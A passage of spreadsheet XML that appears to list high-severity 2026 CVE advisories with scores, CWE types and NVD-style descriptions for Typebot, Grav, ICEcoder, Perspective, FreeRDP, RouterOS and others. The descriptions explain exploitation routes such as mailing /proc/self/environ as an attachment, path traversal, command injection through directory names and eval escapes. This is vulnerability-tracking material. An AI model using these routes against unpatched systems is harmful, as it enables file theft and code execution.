          <t>CVE-2026-62865</t>
        </is>
      </c>
      <c r="C1167" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1167" s="5" t="inlineStr"/>
      <c r="F1167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1167" s="5" t="inlineStr"/>
      <c r="H1167" s="5" t="inlineStr"/>
      <c r="I1167" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1167" s="5" t="inlineStr"/>
      <c r="K1167" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-73</t>
        </is>
      </c>
      <c r="L1167" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions prior to 3.18.0, the server-side Send Email integration block allows arbitrary reading of local files on the server. The block builds Nodemailer attachments from a typebot variable, and its parseAttachments helper returns the supplied value as a filesystem path whenever it does not start with the application's own base URL, instead of requiring an http or https URL. The Nodemailer transport is created without disableFileAccess or disableUrlAccess, both of which default to false, so an attachment specified as an absolute server path is read from the local filesystem and delivered. Because both the attachment value and the recipient list are attacker-controllable typebot variables, any registered user can publish a bot whose Send Email block attaches an absolute path such as /etc/passwd or /proc/self/environ and mails it to an address they control. This enables reading any file the server process can access, including process environment secrets such as the credential encryption key and database connection string, without administrative privileges or victim interaction. Open signup is enabled by default and the system SMTP credential is already configured, so no non-default configuration is required. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="M1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62865</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63188</t>
        </is>
      </c>
      <c r="C1168" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1168" s="5" t="inlineStr"/>
      <c r="F1168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1168" s="5" t="inlineStr"/>
      <c r="H1168" s="5" t="inlineStr"/>
      <c r="I1168" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1168" s="5" t="inlineStr">
        <is>
          <t>Logto is the modern, open-source auth infrastructure for SaaS and AI apps. Prior to 0.3.9, the Logto Tunnel npm package enabled createStaticFileProxy from packages/tunnel/src/commands/tunnel/index.ts and passed request.url from static asset requests through packages/tunnel/src/commands/tunnel/utils.ts using path.join(staticPath, request.url) and then fs.open(requestPath, "r") without URL normalization or a containment check. When --experience-path was enabled and the tunnel port was reachable, an unauthenticated requester could send a path containing ../ to createStaticFileProxy and read files outside the configured static directory that were readable by the logto-tunnel process. The service used server.listen(port), which could expose the tunnel to other hosts depending on the platform and deployment. This issue is fixed in version 0.3.9.</t>
        </is>
      </c>
      <c r="M1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63188</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63383</t>
        </is>
      </c>
      <c r="C1169" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1169" s="5" t="inlineStr"/>
      <c r="F1169" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1169" s="5" t="inlineStr"/>
      <c r="H1169" s="5" t="inlineStr"/>
      <c r="I1169" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1169" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent can read beyond a contiguous evbuffer region in event_tagging.c when decode_tag_internal requests at most five bytes from evbuffer_pullup but iterates using the full logical buffer length. A fragmented evbuffer containing a six-byte malformed tag can therefore advance past the pullup window and trigger an out-of-bounds read, which can crash a process that decodes attacker-controlled tagged RPC data. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63383</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63384</t>
        </is>
      </c>
      <c r="C1170" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1170" s="5" t="inlineStr"/>
      <c r="F1170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1170" s="5" t="inlineStr"/>
      <c r="H1170" s="5" t="inlineStr"/>
      <c r="I1170" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1170" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an incorrect integer conversion in event_tagging.c when evtag_unmarshal_header uses evtag_decode_int to decode an attacker-controlled uint32 payload length and returns it as a signed int. Values above INT_MAX become negative or truncated, and evtag_unmarshal_string can use the converted value in allocation sizing, producing a wrapped large allocation request and denial of service. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63384</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63403</t>
        </is>
      </c>
      <c r="C1171" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1171" s="5" t="inlineStr"/>
      <c r="F1171" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1171" s="5" t="inlineStr"/>
      <c r="H1171" s="5" t="inlineStr"/>
      <c r="I1171" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1171" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the server is vulnerable to an unauthenticated denial of service in which a single malformed command crashes the entire process. Its wire protocol is line-based, and several command handlers slice or index the received line at a fixed offset, such as cmd[5:] for PUSH or qs[0] for QUEUE, without checking that a payload is present. Sending a bare verb with no payload, for example PUSH, ACK, FAIL, BEAT, PUSHB, or QUEUE, triggers a Go slice or index out-of-range panic. Because the codebase has no recover() anywhere in the command-dispatch path, an unrecovered panic in a handler goroutine terminates the whole Go process rather than just that connection, instantly disconnecting every other client, worker, and in-flight job. The attack requires only a connection to the command port and completion of the trivial handshake, with no credentials when no password is configured, and can be repeated to keep the service down indefinitely. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63403</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64836</t>
        </is>
      </c>
      <c r="C1172" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1172" s="5" t="inlineStr"/>
      <c r="F1172" s="5" t="inlineStr"/>
      <c r="G1172" s="5" t="inlineStr"/>
      <c r="H1172" s="5" t="inlineStr"/>
      <c r="I1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-697</t>
        </is>
      </c>
      <c r="L1172" s="5" t="inlineStr">
        <is>
          <t>ICEcoder versions through 8.1 contain a path traversal vulnerability in the file-control endpoint due to a logic error in the document-root confinement check. The File::check() validation function compares realpath() to boolean true, which never succeeds, allowing authenticated attackers to submit traversal sequences or absolute paths in the file parameter to read, write, or delete files outside the configured document root.</t>
        </is>
      </c>
      <c r="M1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64836</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64837</t>
        </is>
      </c>
      <c r="C1173" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1173" s="5" t="inlineStr"/>
      <c r="F1173" s="5" t="inlineStr"/>
      <c r="G1173" s="5" t="inlineStr"/>
      <c r="H1173" s="5" t="inlineStr"/>
      <c r="I1173" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1173" s="5" t="inlineStr">
        <is>
          <t>ICEcoder through 8.1 passes an unescaped filesystem path into a shell command in lib/properties.php, allowing authenticated users to inject OS commands through directory names. Attackers can create directories with shell metacharacters in their names and access the Properties function to execute arbitrary commands as the web-server user via popen().</t>
        </is>
      </c>
      <c r="M1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64837</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64838</t>
        </is>
      </c>
      <c r="C1174" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1174" s="5" t="inlineStr"/>
      <c r="F1174" s="5" t="inlineStr"/>
      <c r="G1174" s="5" t="inlineStr"/>
      <c r="H1174" s="5" t="inlineStr"/>
      <c r="I1174" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1174" s="5" t="inlineStr">
        <is>
          <t>ICEcoder versions through 8.1 fail to properly validate the oldFileName parameter in file move and rename operations, allowing authenticated users to relocate files from outside the document root. Attackers can use path traversal sequences in oldFileName to move files writable by the PHP process into the web-accessible project directory, disclosing file contents and deleting originals.</t>
        </is>
      </c>
      <c r="M1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64838</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64850</t>
        </is>
      </c>
      <c r="C1175" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1175" s="5" t="inlineStr"/>
      <c r="F1175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1175" s="5" t="inlineStr"/>
      <c r="H1175" s="5" t="inlineStr"/>
      <c r="I1175" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1175" s="5" t="inlineStr"/>
      <c r="K1175" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1175" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.7, Grav Blueprint::dynamicData() in system/src/Grav/Common/Data/Blueprint.php sends an editor-controlled Class::method provider and arguments to call_user_func_array() without rejecting dangerous callback parameters. An account with admin.pages or api.pages.write can use Grav\Common\Utils::arrayFilterRecursive() as a trampoline with system as the callback, place a command in page frontmatter, and execute that command as the web server user when the page is viewed. This issue is fixed in version 2.0.7.</t>
        </is>
      </c>
      <c r="M1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64850</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64852</t>
        </is>
      </c>
      <c r="C1176" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1176" s="5" t="inlineStr"/>
      <c r="F1176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1176" s="5" t="inlineStr"/>
      <c r="H1176" s="5" t="inlineStr"/>
      <c r="I1176" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1176" s="5" t="inlineStr"/>
      <c r="K1176" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1176" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.8, the Grav API plugin intercepts the apiKeyGenerate and apiKeyRevoke admin tasks in user/plugins/api/api.php and authorizes the caller with only admin.login. A basic panel user can select another account from the route, create a persistent ApiKeyManager credential bound to that target, and inherit the target's API permissions, including api.super or administrative write access when present. This issue is fixed in version 1.0.8.</t>
        </is>
      </c>
      <c r="M1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64852</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66360</t>
        </is>
      </c>
      <c r="C1177" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1177" s="5" t="inlineStr"/>
      <c r="F1177" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1177" s="5" t="inlineStr"/>
      <c r="H1177" s="5" t="inlineStr"/>
      <c r="I1177" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1177" s="5" t="inlineStr"/>
      <c r="K1177" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1177" s="5" t="inlineStr">
        <is>
          <t>The ISO Presentation layer contains a flaw in the handling of specific 
parameters during normal mode negotiation. A missing length check in the
 processing of the encoded presentation data allows an attacker 
controlled field with a zero length value to trigger a bounded heap over
 read. This condition occurs before MMS session establishment, a crafted
 TCP/102 connection attempt can trigger the issue. The resulting over 
read causes the process to terminate, leading to a denial of service 
condition.</t>
        </is>
      </c>
      <c r="M1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66360</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66840</t>
        </is>
      </c>
      <c r="C1178" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1178" s="5" t="inlineStr"/>
      <c r="F1178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1178" s="5" t="inlineStr"/>
      <c r="H1178" s="5" t="inlineStr"/>
      <c r="I1178" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1178" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497). Sensitive system information may be leaked.</t>
        </is>
      </c>
      <c r="M1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66840</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67195</t>
        </is>
      </c>
      <c r="C1179" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1179" s="5" t="inlineStr"/>
      <c r="F1179" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1179" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1179" s="5" t="inlineStr"/>
      <c r="I1179" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1179" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary operating system commands by submitting crafted expression strings to the PolarsVirtualServer backend, which passes client-supplied input directly to Python's eval() with only __builtins__={} cleared. Attackers can exploit Python object attribute traversal through the interpreter's loaded class list to reach subprocess.Popen via a TableValidateExprReq or TableMakeViewReq protobuf message, achieving arbitrary command execution in the Perspective host process.</t>
        </is>
      </c>
      <c r="M1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67195</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67198</t>
        </is>
      </c>
      <c r="C1180" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1180" s="5" t="inlineStr"/>
      <c r="F1180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1180" s="5" t="inlineStr"/>
      <c r="H1180" s="5" t="inlineStr"/>
      <c r="I1180" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr">
        <is>
          <t>CWE-616</t>
        </is>
      </c>
      <c r="L1180" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a denial-of-service vulnerability in the VirtualServer protocol dispatcher that allows unauthenticated remote attackers to crash the server process by sending malformed or incomplete protobuf messages. Attackers can send well-formed requests such as ViewToArrowReq with no viewport set or MakeTableReq with no data field to trigger unwrap() calls on None values at nine distinct sites, causing the process to abort with SIGABRT.</t>
        </is>
      </c>
      <c r="M1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67198</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67200</t>
        </is>
      </c>
      <c r="C1181" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1181" s="5" t="inlineStr"/>
      <c r="F1181" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1181" s="5" t="inlineStr"/>
      <c r="H1181" s="5" t="inlineStr"/>
      <c r="I1181" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1181" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a path traversal vulnerability that allows unauthenticated remote attackers to read arbitrary files from the server filesystem by including literal ../ segments in HTTP request URL paths. Attackers can bypass the insufficient query-string-stripping sanitization to traverse outside the configured asset root directory and retrieve sensitive files such as system credentials and application secrets, with results exposed cross-origin due to a wildcard Access-Control-Allow-Origin header set on all responses.</t>
        </is>
      </c>
      <c r="M1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67200</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67281</t>
        </is>
      </c>
      <c r="C1182" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1182" s="5" t="inlineStr"/>
      <c r="F1182" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1182" s="5" t="inlineStr"/>
      <c r="H1182" s="5" t="inlineStr"/>
      <c r="I1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-824</t>
        </is>
      </c>
      <c r="L1182" s="5" t="inlineStr">
        <is>
          <t>RouterOS WebFig contains an unauthenticated file-read vulnerability in the /jsproxy path where a newly allocated session retains a stale uninitialized principal pointer used for file authorization. An unauthenticated attacker can prepare the allocator so that the file-serving path dereferences this pointer with sufficient rights, then supply parent-directory components in an encrypted URI to escape the WebFig file namespace and disclose root-owned files, including configuration stores containing credentials.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67281</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67299</t>
        </is>
      </c>
      <c r="C1183" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1183" s="5" t="inlineStr"/>
      <c r="F1183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1183" s="5" t="inlineStr"/>
      <c r="H1183" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1183" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1183" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains a client-side heap use-after-free in the async update message proxy for WINDOW_ICON_ORDER when AsyncUpdate is enabled (e.g. xfreerdp /async-update). In update_message_WindowIcon() a shallow CopyMemory() overwrites a freshly allocated lParam-&gt;iconInfo with the parser-owned windowIcon-&gt;iconInfo pointer. After the parser callback returns, update_recv_window_info_order() frees window_icon.iconInfo, but the queued async message still retains and later dispatches that stale pointer. A malicious or compromised RDP server sending a crafted RAIL Window Alternate Secondary Order with WINDOW_ORDER_ICON can trigger use-after-free, leading to memory corruption and client crash.</t>
        </is>
      </c>
      <c r="M1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67299</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67301</t>
        </is>
      </c>
      <c r="C1184" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1184" s="5" t="inlineStr"/>
      <c r="F1184" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1184" s="5" t="inlineStr"/>
      <c r="H1184" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1184" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1184" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains out-of-bounds read vulnerabilities in the async update message proxy for the PolygonSC and PolygonCB primary drawing orders. When AsyncUpdate is enabled (e.g., xfreerdp /async-update), update_message_PolygonSC() and update_message_PolygonCB() allocate a fresh points array but copy point data from the address of the order structure instead of from polygonSC-&gt;points / polygonCB-&gt;points, resulting in a client-side out-of-bounds read. A malicious or compromised RDP server sending crafted PolygonSC/PolygonCB update orders can trigger memory disclosure or a client crash.</t>
        </is>
      </c>
      <c r="M1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67301</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67304</t>
        </is>
      </c>
      <c r="C1185" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1185" s="5" t="inlineStr"/>
      <c r="F1185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1185" s="5" t="inlineStr"/>
      <c r="H1185" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1185" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1185" s="5" t="inlineStr"/>
      <c r="K1185" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1185" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains a null pointer dereference vulnerability in smartcard device control request cleanup when reader-state decoding fails. Attackers can send malformed smartcard IRP requests with non-zero cReaders and truncated reader-state data to crash the process via null pointer access in free_reader_states functions.</t>
        </is>
      </c>
      <c r="M1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67304</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67327</t>
        </is>
      </c>
      <c r="C1186" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1186" s="5" t="inlineStr"/>
      <c r="F1186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1186" s="5" t="inlineStr"/>
      <c r="H1186" s="5" t="inlineStr"/>
      <c r="I1186" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1186" s="5" t="inlineStr"/>
      <c r="K1186" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1186" s="5" t="inlineStr">
        <is>
